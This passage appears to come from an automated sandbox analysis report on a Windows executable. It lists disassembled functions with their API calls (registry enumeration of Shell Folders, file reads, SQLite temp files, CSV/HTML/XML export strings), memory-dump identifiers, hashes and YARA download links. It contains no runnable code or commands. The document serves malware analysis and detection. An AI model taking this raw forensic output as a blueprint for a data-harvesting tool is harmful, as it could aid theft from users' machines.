                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 265355444-0
                                                                                                                  • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                  • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                  Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                    • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                  • memset.MSVCRT ref: 0040C439
                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                  • memset.MSVCRT ref: 0040C4D0
                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4131475296-0
                                                                                                                  • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                  • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                  Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004116FF
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                  • API String ID: 2618321458-3614832568
                                                                                                                  • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                  • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                  Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFilefreememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2507021081-0
                                                                                                                  • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                  • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                  Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                  • malloc.MSVCRT ref: 00417524
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                  • free.MSVCRT ref: 00417544
                                                                                                                  • free.MSVCRT ref: 00417562
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4131324427-0
                                                                                                                  • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                  • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                  Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: PathTemp$free
                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                  Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040FDD5
                                                                                                                    • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                  • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                  • API String ID: 1775345501-2769808009
                                                                                                                  • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                  • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                  • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                  • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                  Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wcscpy.MSVCRT ref: 0041477F
                                                                                                                  • wcscpy.MSVCRT ref: 0041479A
                                                                                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                  • String ID: General
                                                                                                                  • API String ID: 999786162-26480598
                                                                                                                  • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                  • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                  Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                  • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                  • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                  • API String ID: 313946961-1552265934
                                                                                                                  • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                  • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                  Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: foreign key constraint failed$new$oid$old
                                                                                                                  • API String ID: 0-1953309616
                                                                                                                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                  Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                  • API String ID: 3510742995-272990098
                                                                                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                  Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0044A6EB
                                                                                                                  • memset.MSVCRT ref: 0044A6FB
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                                  • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                  • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                  Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                                  • free.MSVCRT ref: 0040E9D3
                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2241099983-0
                                                                                                                  • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                  • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                  Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                  • malloc.MSVCRT ref: 004174BD
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                  • free.MSVCRT ref: 004174E4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4053608372-0
                                                                                                                  • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                  • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                  Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 0040D453
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4247780290-0
                                                                                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                  Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1471605966-0
                                                                                                                  • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                  • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                  Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wcscpy.MSVCRT ref: 0044475F
                                                                                                                  • wcscat.MSVCRT ref: 0044476E
                                                                                                                  • wcscat.MSVCRT ref: 0044477F
                                                                                                                  • wcscat.MSVCRT ref: 0044478E
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
